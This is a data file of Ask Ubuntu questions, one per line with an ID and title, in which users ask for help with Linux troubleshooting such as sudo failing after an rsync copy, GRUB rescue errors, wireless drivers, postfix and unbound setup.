467943	sudo not working after rsync - unable to open /etc/sudoers : permission denied	bought a new drive . formatted to ext4 , mounted the partition and ran sudo rsync -aax -- delete /* /mnt/ -- exclude= { /dev/* , /proc/* , /sys/* , /tmp/* , /run/* , /mnt/* , /media/* , /lost+found } this moved all my files successfully then i edited the /etc/fstab , updated the grub and rebooted everything works except for sudo which returns sudo : unable to open /etc/sudoers : permission denied sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin already checked the other answers and after mounting + chroot to drive , ran : chmod 0440 /etc/sudoers chown root : root /etc/sudoers chmod 0440 /etc/sudoers.d/readme here is the trace if it helps . ltrace -u hbt sudo __libc_start_main ( 0x8049f00 , 1 , 0xbfe76c84 , 0x8053e90 , 0x8053f00 < unfinished ... > setlocale ( 6 , `` '' ) = `` en_us.utf-8 '' bindtextdomain ( `` sudo '' , `` /usr/share/locale '' ) = `` /usr/share/locale '' textdomain ( `` sudo '' ) = `` sudo '' geteuid ( ) = 0 sigemptyset ( 0xbfe76ad0 ) = 0 sigprocmask ( 2 , 0xbfe76ad0 , null ) = 0 getrlimit64 ( 6 , 0x805ac00 , 0 , 0 , 0 ) = 0 setrlimit64 ( 6 , 0xbfe76ba0 , 0 , 0 , 0 ) = 0 getrlimit64 ( 4 , 0x805abf0 , 0 , 0 , 0 ) = 0 setrlimit64 ( 4 , 0xbfe76ba0 , 0 , 0 , 0 ) = 0 fcntl ( 0 , 3 , 0 , 0 , 0 ) = 2 fcntl ( 1 , 3 , 0 , 0 , 0 ) = 2 fcntl ( 2 , 3 , 0 , 0 , 0 ) = 2 malloc ( 128 ) = 0x088b2870 getuid ( ) = 1001 geteuid ( ) = 0 getgid ( ) = 1001 getegid ( ) = 1001 getpwuid ( 1001 , 4 , 0 , 0 , 0 ) = 0xb77a1d0c strlen ( `` user '' ) = 4 strlen ( `` hassen '' ) = 6 malloc ( 12 ) = 0x088b4158 memcpy ( 0x088b4158 , `` user '' , 4 ) = 0x088b4158 memcpy ( 0x088b415d , `` hassen '' , 6 ) = 0x088b415d getenv ( `` shell '' ) = `` /usr/bin/zsh '' strlen ( `` /usr/bin/zsh '' ) = 12 malloc ( 13 ) = 0x088b4168 memcpy ( 0x088b4168 , `` /usr/bin/zsh '' , 12 ) = 0x088b4168 __vasprintf_chk ( 0x88b2874 , 1 , 0x8054fd6 , 0xbfe759f8 , 0 ) = 8 __vasprintf_chk ( 0x88b2878 , 1 , 0x8054fd5 , 0xbfe759f8 , 0 ) = 6 __vasprintf_chk ( 0x88b287c , 1 , 0x8054fde , 0xbfe759f8 , 0 ) = 8 __vasprintf_chk ( 0x88b2880 , 1 , 0x8054fdd , 0xbfe759f8 , 0 ) = 9 getgroups ( 0 , 0 , 1001 , 0 , 0 ) = 5 malloc ( 20 ) = 0x088b4180 getgroups ( 5 , 0x88b4180 , 1001 , 0 , 0 ) = 5 malloc ( 62 ) = 0x088b4198 __snprintf_chk ( 0x88b419f , 55 , 1 , -1 , 0x8055000 ) = 1 __snprintf_chk ( 0x88b41a0 , 54 , 1 , -1 , 0x8055000 ) = 3 __snprintf_chk ( 0x88b41a3 , 51 , 1 , -1 , 0x8055000 ) = 4 __snprintf_chk ( 0x88b41a7 , 47 , 1 , -1 , 0x8055000 ) = 4 __snprintf_chk ( 0x88b41ab , 43 , 1 , -1 , 0x8055000 ) = 5 getcwd ( 0xbfe75a2c , 4096 ) = `` / '' strlen ( `` cwd '' ) = 3 strlen ( `` / '' ) = 1 malloc ( 6 ) = 0x088b4228 memcpy ( 0x088b4228 , `` cwd '' , 3 ) = 0x088b4228 memcpy ( 0x088b422c , `` / '' , 1 ) = 0x088b422c ttyname ( 0 ) = null ttyname ( 1 ) = null ttyname ( 2 ) = null gethostname ( `` hassen-desktop '' , 64 ) = 0 strlen ( `` host '' ) = 4 strlen ( `` hassen-desktop '' ) = 14 malloc ( 20 ) = 0x088b5240 memcpy ( 0x088b5240 , `` host '' , 4 ) = 0x088b5240 memcpy ( 0x088b5245 , `` hassen-desktop '' , 14 ) = 0x088b5245 ioctl ( 2 , 21523 , 0xbfe759d8 ) = 0 __vasprintf_chk ( 0x88b2890 , 1 , 0x8055013 , 0xbfe759f8 , 0xbfe76a2c ) = 8 __vasprintf_chk ( 0x88b2894 , 1 , 0x805501c , 0xbfe759f8 , 0xbfe76a2c ) = 8 malloc ( 128 ) = 0x088b52e0 getifaddrs ( 0xbfe769a8 , 110 , 119 , 124 , 0 ) = 0 malloc ( 184 ) = 0x088b5368 inet_ntoa ( 0x6400a8c0 ) = `` 192.168.0.100 '' __snprintf_chk ( 0x88b5368 , 184 , 1 , -1 , 0x805428d ) = 14 inet_ntoa ( 0x00ffffff ) = `` 255.255.255.0 '' snprintf ( `` 255.255.255.0 '' , 198 , `` % s '' , `` 255.255.255.0 '' ) = 13 inet_ntop ( 10 , 0x88b5fc8 , 0xbfe769ae , 46 , 0x805428d ) = 0xbfe769ae __snprintf_chk ( 0x88b5383 , 211 , 1 , -1 , 0x805428d ) = 27 inet_ntop ( 10 , 0x88b5fec , 0xbfe769ae , 46 , 0x805428d ) = 0xbfe769ae snprintf ( `` ffff : ffff : ffff : ffff : : '' , 238 , `` % s '' , `` ffff : ffff : ffff : ffff : : '' ) = 21 freeifaddrs ( 0x88b5c98 , 238 , 0x8054dba , 0xbfe769ae , 0x805428d ) = 0 getopt ( 1 , 0xbfe76c84 , `` +aa : bc : c : d : eeg : hhikklnpp : r : sst : u '' ... ) = -1 malloc ( 8 ) = 0x088b5280 malloc ( 84 ) = 0x088b5428 strlen ( `` progname '' ) = 8 strlen ( `` sudo '' ) = 4 malloc ( 14 ) = 0x088b5480 memcpy ( 0x088b5480 , `` progname '' , 8 ) = 0x088b5480 memcpy ( 0x088b5489 , `` sudo '' , 4 ) = 0x088b5489 strlen ( `` implied_shell '' ) = 13 strlen ( `` true '' ) = 4 malloc ( 19 ) = 0x088b5498 memcpy ( 0x088b5498 , `` implied_shell '' , 13 ) = 0x088b5498 memcpy ( 0x088b54a6 , `` true '' , 4 ) = 0x088b54a6 strlen ( `` network_addrs '' ) = 13 strlen ( `` 192.168.0.100/255.255.255.0 fe80 '' ... ) = 75 malloc ( 90 ) = 0x088b54b0 memcpy ( 0x088b54b0 , `` network_addrs '' , 13 ) = 0x088b54b0 memcpy ( 0x088b54be , `` 192.168.0.100/255.255.255.0 fe80 '' ... , 75 ) = 0x088b54be fopen64 ( `` /etc/sudo.conf '' , `` r '' ) = 0 malloc ( 16 ) = 0x088b5290 malloc ( 16 ) = 0x088b52a8 __snprintf_chk ( 0xbfe75a6c , 4096 , 1 , 4096 , 0x8054bbe ) = 24 __xstat64 ( 3 , `` /usr/lib/sudo/sudoers.so '' , 0xbfe75a0c ) = 0 dlopen ( `` /usr/lib/sudo/sudoers.so '' , 257 ) = 0x088b5530 dlsym ( 0x088b5530 , `` sudoers_policy '' ) = 0xb73b64e0 __snprintf_chk ( 0xbfe75a6c , 4096 , 1 , 4096 , 0x8054bbe ) = 24 __xstat64 ( 3 , `` /usr/lib/sudo/sudoers.so '' , 0xbfe75a0c ) = 0 dlopen ( `` /usr/lib/sudo/sudoers.so '' , 257 ) = 0x088b5530 dlsym ( 0x088b5530 , `` sudoers_io '' ) = 0xb73b6520 malloc ( 20 ) = 0x088b5d70 fputs ( `` sudo '' , 0xb77a0980sudo ) = 1 fputs ( `` : `` , 0xb77a0980 : ) = 1 fputs ( `` unable to open /etc/sudoers '' , 0xb77a0980unable to open /etc/sudoers ) = 1 fputs ( `` : `` , 0xb77a0980 : ) = 1 fputs ( `` permission denied '' , 0xb77a0980permission denied ) = 1 fputs ( `` \n '' , 0xb77a0980 ) = 1 -- - sigchld ( child exited ) -- - fputs ( `` sudo '' , 0xb77a0980sudo ) = 1 fputs ( `` : `` , 0xb77a0980 : ) = 1 fputs ( `` no valid sudoers sources found , `` ... , 0xb77a0980no valid sudoers sources found , quitting ) = 1 fputs ( `` \n '' , 0xb77a0980 ) = 1 dcgettext ( 0 , 0x805558c , 5 , 0x88b5428 , 0x88b2870 ) = 0x805558c __errno_location ( ) = 0xb75f9688 fputs ( `` sudo '' , 0xb77a0980sudo ) = 1 dcgettext ( 0x8053f9b , 0x8053f98 , 5 , 0 , 0x8048ad8 ) = 0x8053f98 fputs ( `` : `` , 0xb77a0980 : ) = 1 __vfprintf_chk ( 0xb77a0980 , 1 , 0x805558c , 0xbfe76a98 , 0x8048ad8unable to initialize policy plugin ) = 34 _io_putc ( '\n ' , 0xb77a0980 ) = 10 strncpy ( 0xbfe768b4 , `` '' , 32 ) = 0xbfe768b4 getutxline ( 0xbfe768ac , 0x8059b40 , 32 , -4 , 0 ) = 0 exit ( 1 < unfinished ... > +++ exited ( status 1 ) +++ notice it can access /etc changing the permissions to 0442 triggers a different warning -- to set back to 0440 i 've ran this exact rsync command before on other drives and it worked . i have no problems on the old drive and sudo runs fine . what am i missing ? is it an rsync option ? how to fix sudo ? thank you !
467944	run gnome-shell with nvidia optimus	the performance of gnome-shell on my computer is very sub-par ( all animation is choppy , and window redraw is sometimes very delayed on resize , maximize , etc ) . would it be possible to , just like with other apps , run gnome-shell with the optimus card using bumblebee ? is there a better solution to this terrible lag ? computer : lenovo t430s graphics : intel hd graphics 4000 nvidia n13m-ns optimus graphics 1gb
467945	input/output error drive mount error ntfs partition	my ntfs partition is not mounting , whenever it mounts it shows an input output error.before this problem occurred my laptop actually powered off while a movie was being played and after that i am not able to see any files in that partition , only that error .
467947	unity launcher dissapears	when you open two or more windows of the same program , the icon in the unity laucher shows two or more arrows telling you there are more instances opened . and then when you click on the icon all the winodws are displayed so you can choose one of them right ? ? this is not happening to me ! ! ! i just updataed my ubuntu 14.04 [ sudo apt-get upgrade ] when i click on the icon , the screen blinks and my unity launcher disspaears d : what can i do ? ? heeeeeeeelp ! ! !
467950	set default language for sudo	if i enter a command , the output is translated in the language i am using on the system . but if i use sudo to run a command with root privileges , the output is always in english . how can i change this ?
467953	how to make titlebar transparent and square up corners in default ambiance theme gtk3	how to square up title bar rounded corners of ambiance theme gtk3 based theme in ubuntu 14.04 ? and is there any way to make window title bar transparent in ubuntu 14.04 ?
467954	colour depth with androvm and virtualbox on ubuntu	i am running a virtualbox with androvm and am feeling a bit out of my depth . it seems that the virtual screen is running at 16bit rather than 32bit . all the searching i have done points to guest additions which i have downloaded and is available as a cd drive . i really have no idea what i am supposed to do with it and am less sure after reading the online documentation relating to guest additions . i would like to set the screen colour depth correctly so that i can play some android games . i feel like this should be really simply but i have literally no idea what i am supposed to do to get what i want out of the virtual system . so nice and simple so the slow kid here can understand can someone talk me through whatever it is that i need to do to change the screen colour depth on the virtual android tablet i am running . thank you for you help in advance .
467955	wireless network card is dectected but not working ubuntu 12.04 hp pavillion g6	i recently installed ubuntu 12.04 on my hp pavillion g6 2207tx alongwith windows 8 dual boot option.but my network manager does n't show any wireless option also `` rfkill list '' command does n't show any card ? any help ? > gaurav @ gaurav-hp-pavilion-g6-notebook-pc : ~ $ lspci > 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) > 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) > 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) > 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) > 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) > 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) > 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) > 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) > 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) > 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) > 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) > 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) > 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) > 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) > 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7500m/7600m series ] > 07:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie > 07:00.1 bluetooth : ralink corp. rt3290 bluetooth > 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) > 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) gaurav @ gaurav-hp-pavilion-g6-notebook-pc : ~ $ lshw -c network warning : you should run this program as super-user . pci ( sysfs ) *-network unclaimed description : network controller product : rt3290 wireless 802.11n 1t/1r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:07:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : memory : c3510000-c351ffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : 05 serial : 28:92:4a:50 : a5:51 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.2.3 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport:3000 ( size=256 ) memory : c3404000-c3404fff memory : c3400000-c3403fff
467956	missing lunch when building ubuntu-emulator from source	i 'm following the guide to build ubuntu emulator from source all commands work fine up to lunch aosp_arm-userdebug both that one and using the argument aosp_x86-userdebug cause the same error : build/core/product_config.mk:234 : *** can not locate config makefile for product `` aosp_arm '' . stop . device arm not found . attempting to retrieve device repository from phablet.ubuntu.com and then from cyanogenmod github ( http : //github.com/cyanogenmod ) . repository for arm not found in the cyanogenmod github repository list . if this is in error , you may need to manually add it to your local_manifests/roomservice.xml . build/core/product_config.mk:234 : *** can not locate config makefile for product `` aosp_arm '' . stop . ** do n't have a product spec for : 'aosp_arm' ** do you have the right repo manifest ? when i run the lunch command alone i get the following options : lunch menu ... pick a combo : 1. full-eng 2. full_x86-eng 3. vbox_x86-eng 4. full_mips-eng 5. mini_armv7a_neon-userdebug 6. mini_armv7a-userdebug 7. cm_goldfish-eng 8. cm_goldfish-userdebug 9. cm_goldfish-user 10. mini_mips-userdebug 11. mini_x86-userdebug 12. full_panda-userdebug is there some more that needs to be done to make sure you got the aosp* options ?
467960	laptop video edit	well , i have a laptop and i want to do some professional work on video editting . but i can use only my laptop which runs ubuntu 14.04 . i am mainly using openshot . i need to create a lot of 3d titles - i have already created some but i need more . is it safe for my laptop to have its processor running all the time with a temperature of 81째c at 80-100 % load ? some video edits require the cpu running at these stages for about 3 hours ! is it safe to continue my work or i should stop immediately ?
467961	append an output of a command to a txt file and place it in non writable directory ?	if i try for example : directory a i do n't have write permission on it sudo ls -l > /home/a/a.txt bash : /home/a/a.txt : permission denied then how can i do this trick , any suggestion is appreciated .
467966	specific plugin for internal questions	i do n't know exactly whether i am asking on the right stackexchange 's community or not , but here is the problem . i am looking for a plugin , app , or anything , where employees can ask questions internally ( a kind of office communicator ) . nowadays the solution is asking at real time , but it is considered `` annoying '' once one is doing `` something important '' but feel like answering the question of another employee , stopping and having to resume that `` something important '' thing . so my question is : is there an app where a given employee can ask / assign a question which is recorded somewhere ( network , plugin itself ) and this question remains available to a specific group / a specific person / everyone ? ( eg : a developer wants to answer to the testers whats the need of some function call ) the reason behind is that i think this solution might be faster / more informal than a company email : ) we use ubuntu 12.04 sorry for the english btw
467967	integrate kupfer functionality in dash	is there a way to integrate some of kupfer 's functionality in the dash search ? i like dash , but it 's lacking some nice features : ( i know i 'm being a bit fussy . ) partial search - in kupfer i do n't have to type exactly in order . let 's say , i have both version 3.7 and 4.3 of eclipse installed . in kupfer i can search for the former by typing in ec3 . no need to type out eclipse 3 . calculator - e.g . typing =2 + sqrt ( 2 ) * pi gives me the result there 's a plugin to use the browsers search engines . so i can highlight something in a text document and then open kupfer and type in du , which is enough to find duckduckgo and then search for the hightlighted text on that site . of course i can also first select the search engine and then type my text to search for . i can search for an application and then set it up to start in 3 minutes with just a few keystrokes . ( the same can be done for showing a message on screen . for example , to remind me of something . )
467969	bricked grub after deleting a partition on my hard disk	i have lubuntu and linux mint installed on my pc . mint i bricked by removing the network folder in an attempt to make wifi work . i was trying to install minix when it asked on which partition i wanted to install and said it would overwrite the partition . it let me choose between : h0 linux h1 extended i did n't know which one to pick , so i quit the installation and logged into lubuntu to check out my partitions . there were four partitions . i decided to delete the one called filesystem because i thought it was the broken linux mint installation . lubuntu warned me though and said it was being used , so i quit the deletion . next i tried another partition . i thought this would n't be a problem , since there would still be a partition with lubuntu . so i booted back to my live cd with minix on it , and got presented with the same options as before . this made me think i might need to explicitly create a partition with a name or something , so i decided to boot back into lubuntu . instead of the usual screen with selection between mint and lubuntu , however , i was promtped with an error message : error : no such partition grub rescue > i 'm now booted from my lubuntu live cd . the partitions now are : filesystem partition 1 83gb ext4 device /dev/sda1 partition type linux ( bootable ) contents ext4 ( version 1.0 ) in use yes , mounted at /media/lubuntu/ [ jibberish ] / [ my old username ] extended partition partition 2 77 gb device /dev/sda2 partition type extended contents extended partition swap partition 5 2.1gb swap device /dev/sda5 partition type linux swap contents swap ( version 2 ) in use yes free space 75 gb device /dev/sda contents unallocated space ( master boot record ) i 've read about grub being the program that let me select which os i wanted to boot into upon turning on my computer and that its files are installed in a partition . there are people suggesting to use a windows live cd to install the windows boot program , but i do n't have a windows live cd . is there any way to fix this ? i suppose i could reinstall lubuntu from the cd , but i 've read that that wo n't fix the grub error . please help
467973	php - how to install php-curl without downgrading php version	i 'm trying to install the php5-curl package , but i 'm getting the dependency error : the following packages have unmet dependencies : php5-curl : depends : phpapi-20090626 depends : php5-common ( = 5.3.10-1ubuntu3.11 ) but 5.5.5+dfsg-1+debphp.org~precise+2 is to be installed e : unable to correct problems , you have held broken packages . i have found this guide here on askubuntu , but i 'm afraid that will downgrade my php installation to an older version , which i do n't want . this is the php version i have installed : tomica @ as5830tg-elementary : ~/documents/apktool $ php -- version php 5.5.5-1+debphp.org~precise+2 ( cli ) ( built : oct 28 2013 12:57:03 ) copyright ( c ) 1997-2013 the php group zend engine v2.5.0 , copyright ( c ) 1998-2013 zend technologies with zend opcache v7.0.3-dev , copyright ( c ) 1999-2013 , by zend technologies is there any way for me to keep the php 5.5.5-1 and still install php-curl ?
467976	how to append command output to multiple files ?	how can i append a command 's output to multiple files ? for example , the command man ls , i need to append its output into three different text files using one command in terminal .
467980	openvpn problem	when i connect to a vpn i get a message `` connection succesfully established '' . i can download files with good speed , surf the internet apart from google search . seems i can not search anyting in google . bing search works ok . installed chromium - same thing . also when i connect to vpn my xchat starts lagging and disconnecting . any ideas whats wrong ?
467981	change brightness on asus g53jw with ubuntu 14.04	i have an asus g53jw and i ca n't manage to change the brightness anyhow ( fn hotkeys are not working ) . i used debian for 6 months and had the same issue and never found i way around this . i did search a lot before posting and the best i could get was this ( by @ raaz ) , but it is a workaround and only change the gamma , not the actual brightness ( this type of solution killed my battery before ) . there is this other question regarding the same computer , but with no proper answer and it was related to 12.10 , not 14.04 ( my current version ) . and i also tried xbacklight and brightness-controller without success . any idea ? thank you ! edit it is really hard to find a solution : here is the proof . i 've been search that long as well .
467983	i want to know how to create a multi boot dvd with all the ubuntu flavors ( kubuntu , lubuntu , xubuntu and ubuntu )	i am a computer teacher . i am introducing my students to linux , and i wish to create a multi boot live-dvd ( single layer , 4.5gb ) with all the ubuntu flavors ( kubuntu , lubuntu , xubuntu and ubuntu 14.04 ) to use it in class . i have tried the following windows utilities ( because i am used to windows , but i also have installed ubuntu 12.04 lts on my computer ) : - x-boot : the iso image is too big to fit in a single dvd ( it duplicates the isos ) . - sardu : only support certain flavors of ubuntu ( ubuntu y kubuntu ) - magic iso : created the iso image successfuly , but it failed to recognize the blank dvd in the dvd unit . tried to burn the iso with nero , but the dvd does not boot , an error message appears . i got tired to search over the internet , so i hope someone could help me regards jorge arce ortiz
467985	dual boot w/ uefi and luks - what do i need to know/do ?	i want to rebuild my mobile workstation ( hp elitebook 8560w ) to dual boot centos 6.5 and ubuntu 14.01lts . i would like to protect both instances with luks . in my research i have come across a few items i do not understand or need guidance with . should i partition the drive , including the efi system partition , before beginning either installation ? my centos build requires several partitions for / , /home , /tmp , /var/log etc . ; can i use logical volumes inside a luks partition for this , or does each filesystem require its own luks partition ? will i need to use or chain load grub with this design ? ( i think the answer is `` no '' ... not certain . ) does it matter which distribution i install first ? thanks much for any guidance . i will try to provide updates as i make progress .
467986	how to make grub boot straight to ubuntu server 14.04	i was following this tutorial and it says to gksudo gedit /etc/default/grub but i get this message : root @ ubuntubirdcage : /home/bird47 # gksudo gedit /etc/default/grub ( gksudo:8029 ) : gtk-warning ** : can not open display : did they change something for ubuntu 14.04 ? i want to boot straight into my ubuntu server , and not have to select it from this list . thank you ! : )
467987	multiple dropbox not starting on startup	i 'm not entirely sure where to ask this question , as it is not really ubuntu specific ( it just happens that i use ubuntu ) . i have set up 3 parallel dropboxes on my computer ( i followed one of the many tutorials to do so , e.g . this one ) , and most of the times all 3 of them start just as expected . but every once in a while , when i reboot , one or two of them are missing . when i try to start the scripts from the terminal ( sending them to the bg ) , they then start as expected -- most of the times . every once of a while i get the following error message : another instance of dropbox ( pid ) is running ! upon which the script exits . has anybody come across this behaviour ? any lead as to how i could fix this ?
467990	the launcher icon edges disappeared after updates	i 'm using ubuntu 14.04 . after receiving updates today the edges in the icons in the launcher disappeared ( all the icons have transparent edges , even the ones that have applications running ) . anyone else is experiencing the same issue ?
467993	cant install rtl8723ae wireless driver for lenovo yoga 11s	i recently downloaded 12.10 on my lenovo yoga 11s . installing was a nighmare dealing with efi but i got it working . my problem now is that i have no internet neither wifi nor ether . only on my windows 8 partition does it work . i have downloaded several driver packages from various sources . none of them work with their instructions.i cd into the rtl downloaded and extracted folder and then hit make . then it tells me no such file or directory . i know it is there but no go . how to solve this ? this is from the terminal owner @ home : ~/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 $ sudo su root @ home : /home/owner/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 # make install make -c /lib/modules/3.5.0-17-generic/build m=/home/owner/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 modules make : *** /lib/modules/3.5.0-17-generic/build : no such file or directory . stop . make : *** [ all ] error 2 root @ home : /home/owner/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 # ^c root @ home : /home/owner/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 #
467997	can i make a ubuntu distro and distribute it ?	can i make my own ubuntu distro and let people download it for free on my website
468000	sync flash drive os with virtual	i have installed ubuntu ( lubuntu 14.04 specifically , but i do n't think that matters for this question ) to a usb flash drive ( full install , not live system ) so i can have an ubuntu environment i can take with me anywhere . i use it for development on a project i am working on . i would like to copy the flash drive 's partitions to virtual disks and run them from virtualbox when i am at home , both to take advantage of the speed of my desktop and to minimize wear on the flash media . my question is when i go back on the road , how do i sync the changes ( both project contents and os changes ) back to the flash drives partitions ? i would really like to avoid having to recopy whole partitions each time . i was thinking of booting virtualbox to a live environment and then using something like rsync . would that work and would the files be copied correctly ( permissions , etc. ) . i do n't know much about rsync . what kind of command would i need . bonus question : any recommendations as to the best way to initially create the virtual disk files ? i was thinking again of booting into a live environment but for this initial time using something like gparted to copy the partitions in tact . that way the uuids match so fstab can stay the same .
468002	ubuntu 14 not loading printer	i have a hp laser ( hp laserjet m1132 mfp ) printer . when ubuntu finish booting , the printer seems to be not connected to the system , but after 10 minutes it comes online . why it does load the printer so late ?
468008	two partitions versus two disk drives	what is the difference between two operating systems on two different partitions on the same disk versus two operating systems on two different disk ? what is the jargon for each case ? what can one do which the other can not do ? for example can you run two disks at the same time , but not two partitions at the same time ? when people talk about two operating systems on the same computer , i can not tell if they are referring to two partitions on the same disk , or two separate disks .
468009	videocalling in ubuntu	i want to make video calls in ubuntu . facebook does n't seem to work , so i thought i 'd download and install skype from its page . is there any risk ? thanks .
468013	finding the focused window at a glance	on ubuntu , finding a focused window while working is a little bit difficult . how can it be fixed ? i am working on ubuntu 14.04 with two full hd displays . the mistake i always make is typing to an unfocused window on the other display , believing the window has focus . i know its decoration is different from focused one , but by default it 's too subtle to recognize at a glance . how can i fix the problem ? i installed compizconfig and changed the weight of dropping shadow , but it was n't enough .
468015	sound jumping between speakers and headphones when volume is high	i am using ubuntu 14.04 , but had this problem on previous versions of ubuntu . when the volume is higher than 45 % and i am playing music the sound switches between head phones and speakers , but there is no headphones plugged in . it does not matter which program is used to play music with .
468017	dual postfix setup for local and gmail	on my ubuntu 14.04 desktop , i setup local mail using postfix by following this guide exactly . is it possible to retain the local messaging functionality while adding an external ( gmail ) account to send command line emails to the outside world ? if so , how ? edit - basically , i want cron messages to be local and the ability to fire off command line emails via gmail . edit- current config : $ postconf -n alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no config_directory = /etc/postfix default_transport = error home_mailbox = maildir/ inet_interfaces = loopback-only mailbox_size_limit = 0 mydestination = hp-pavilion-dv7.laptop , hp-pavilion-dv7 , localhost.localdomain , localhost myhostname = hp-pavilion-dv7 mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 myorigin = /etc/mailname readme_directory = no recipient_delimiter = + relay_transport = error relayhost = smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_use_tls = yes
468018	dpkg installation problem	when i am trying to install a package it is giving me this error . deb @ nvidia : /home/nvidia # sudo dpkg -i cuda-repo-ubuntu1304-6-0-ea_6.0-13_armhfd dpkg : warning : files list file for package 'cuda-repo-ubuntu1204 ' missing ; assud dpkg : warning : files list file for package 'cuda-license-6-0 ' missing ; assumingd dpkg : warning : files list file for package 'cuda-misc-6-0 ' missing ; assuming pad dpkg : warning : files list file for package 'cuda-command-line-tools-6-0 ' missind dpkg : warning : files list file for package 'cuda-extra-libs-6-0 ' missing ; assumd dpkg : warning : files list file for package 'cuda-core-6-0 ' missing ; assuming pad dpkg : warning : files list file for package 'cuda-core-libs-6-0 ' missing ; assumid dpkg : warning : files list file for package 'cuda-samples-6-0 ' missing ; assumingd dpkg : warning : files list file for package 'cuda-headers-6-0 ' missing ; assumingd ( reading database ... 40716 files and directories currently installed . ) preparing to replace cuda-repo-ubuntu1304-6-0-ea 6.0-1 ( using cuda-repo-ubuntu1 . unpacking replacement cuda-repo-ubuntu1304-6-0-ea ... setting up cuda-repo-ubuntu1304-6-0-ea ( 6.0-1 ) ... ok ideas to resolve it are welcome .
468019	terminal user and guest account logged into gui interacting with each other	what we have : i want to connect to a remote linux box via ssh with an account with superuser privileges . this linux machine has one current logged in user who is using a gui on a guest account . what i 've tried to do : i want to send this guest-user a message from the terminal thatwill pop up on their screen . write command does not work , it says the user is not logged in . i tried both `` guest '' and `` guest-jt '' ( which is the current temporary name of the guest per the `` w '' command '' . what i want to do : how can i write this guest user a pop-up message from the terminal with my superuser ? and can they write me back without going into a terminal themselves ?
468021	error error parsing environment `` maas '' : no public ssh keys found..is it a bug	no matter what i do i get error error parsing environment `` maas '' : no public ssh keys found my environments.yaml file . ( authorized key added as per another ask , ubuntu help example ) juju : environments ( dimitern edit : what is this line for ? ) environments : maas : type : maas maas-server : 'http : //xxx.xxx.xxx.xx/maas/' maas-oauth : ' wvny2rczvukspur3xw : pepz9quclmzv5kqq3g : mlywusvjbsample' admin-secret : 'sample' bootstrap-addresses-delay : 10 bootstrap-retry-delay : 5 bootstrap-timeout : 3600 authorized-keys-path : ~/.ssh/id_rsa.pub
468022	how can i get unbound start up with system	i installed the latest unbound in ubuntu 14.04 from ubuntu main server and do some configuration in unbound.conf . then , reboot the system . i found unbound did n't work at all after system on . but when i start it with command `` sudo invoke-rc.d unbound start '' , i found unbound started up successfully . i checked /var/log/syslog and found some error occured while unbound-anchor updated the root key file during unbound started up with system . the error like this : unbound-anchor : /var/lib/unbound/root.key has content unbound-anchor : fail : the anchor is not ok and could not be fixed i checked /etc/init.c/unbound and found the scrpit to update the root key . like this if $ root_trust_anchor_update ; then unbound-anchor -a $ root_trust_anchor_file -v 2 > & 1 | logger -p daemon.info -t unbound-anchor chown unbound : unbound $ root_trust_anchor_file fi i run `` sudo unbound-anchor -a /var/lib/unbound/root.key -v 2 > & 1 | logger -p daemon.info -t unbound-anchor '' , and found it worked well . i guess it 's about something like lack of authority while unbound-anchor execute . i have no idea about how to fix it . this is my configuration in unbound.conf . i checked it with unbound-checkconf command and no error found . include : `` /etc/unbound/unbound.conf.d/*.conf '' server : verbosity : 5 use-syslog : no logfile : `` /var/lib/unbound/unbound.log '' log-time-ascii : yes log-queries : no val-log-level : 0 statistics-interval : 600 statistics-cumulative : yes 